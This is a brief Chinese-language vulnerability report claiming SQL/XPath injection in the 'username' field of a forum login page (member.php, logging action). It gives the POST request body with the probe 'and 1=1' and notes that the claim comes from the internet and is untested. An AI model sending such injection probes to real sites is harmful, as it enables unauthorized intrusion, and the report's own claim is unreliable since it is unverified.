漏洞类型:SQL注入/Xpath

请求方式:POST

影响页面:http://127.0.0.1/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes

提交参数:username

参数测试:and 1=1

攻击细节:username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield

漏洞来源:网络,真实性未测……